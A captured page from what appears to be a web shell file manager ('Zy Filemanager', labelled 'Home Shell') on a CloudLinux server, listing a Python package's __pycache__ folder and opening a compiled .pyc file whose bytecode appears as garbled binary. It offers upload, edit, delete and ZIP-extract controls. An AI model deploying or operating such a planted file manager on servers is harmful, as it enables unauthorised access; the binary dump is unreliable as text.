⚠️ BACKUP DATA ANDA SECARA TERATUR! File manager ini untuk keperluan teknis.
Zy Filemanager
berang berang bawa gelek berangkat lek !!!
🌙 Dark Mode
🏠 Home Shell
🔄 Refresh
Current Path:
Home Shell
/
opt
/
cloudlinux
/
venv
/
lib
/
python3.11
/
site-packages
/
libfuturize
/
__pycache__
⬆️ Parent Directory
📁 File Browser
Name
Size
Permissions
Modified Date
Actions
📄
__init__.cpython-311.pyc
(211 bytes)
211 B
0644
📅
✏️
✍️
⬇️
🗑️
📄
fixer_util.cpython-311.pyc
(21,238 bytes)
20.74 KB
0644
📅
✏️
✍️
⬇️
🗑️
📄
main.cpython-311.pyc
(15,913 bytes)
15.54 KB
0644
📅
✏️
✍️
⬇️
🗑️
📤 Upload Files
Single File
Multiple Files
ZIP Extract
ZIP file will be deleted after extraction
➕ Create New
New Folder
New File
✍️ Editing: fixer_util.cpython-311.pyc
File: /opt/cloudlinux/venv/lib/python3.11/site-packages/libfuturize/__pycache__/fixer_util.cpython-311.pyc
Size: 20.74 KB | Last Modified: 2026-01-20 20:01:48
💾 Backup File
🔢 Toggle Line Numbers
� �|oiVD � �l � d Z ddlmZmZmZmZmZmZ ddlm Z m Z ddlmZ mZ ddlmZ ddlm Z mZmZm Z mZmZ ddlZd� Zdd �Zdd �Zdd�Zd� Zd � Zd� Zd� Zd d�Ze j e j e j e j e j! fZ"e j# e j$ fZ%d� Z&dd�Z'd� Z(d� Z)d� Z*d� Z+d� Z,d� Z-d� Z.dZ/dZ0d� Z1d� Z2dd�Z3dS )!z� Utility functions from 2to3, 3to2 and python-modernize (and some home-grown ones). Licences: 2to3: PSF License v2 3to2: Apache Software License (from 3to2/setup.py) python-modernize licence: BSD (from python-modernize/LICENSE) � )� FromImport�Newline� is_import� find_root�does_tree_import�Comma)�Leaf�Node)�python_symbols�python_grammar)�token)r �Call�Name�symsr �NumberNc �B � � d� v r� S � � d� � r � dd� � � fd�|D � � }t |� � dk r/t dd� d � |D � � � � z � � �t |� � d k rt d� � �|d S )al Examples: >>> canonical_fix_name('fix_wrap_text_literals') 'libfuturize.fixes.fix_wrap_text_literals' >>> canonical_fix_name('wrap_text_literals') 'libfuturize.fixes.fix_wrap_text_literals' >>> canonical_fix_name('wrap_te') ValueError("unknown fixer name") >>> canonical_fix_name('wrap') ValueError("ambiguous fixer name") z.fix_�fix_� Nc �d �� g | ],}|� d � �� � � � �*|��-S )zfix_{0})�endswith�format)�.0�f�fixs ��h/builddir/build/BUILD/cloudlinux-venv-1.0.10/venv/lib/python3.11/site-packages/libfuturize/fixer_util.py� <listcomp>z&canonical_fix_name.<locals>.<listcomp>( sG �� � 7� 7� 7�q��J�J�y�/�/��4�4�5�5�7�� 7� 7� 7� � zOAmbiguous fixer name. Choose a fully qualified module name instead from these: � c 3 � K � | ] }d |z V � � dS )z N� )r �myfs r � <genexpr>z%canonical_fix_name.<locals>.<genexpr>- s&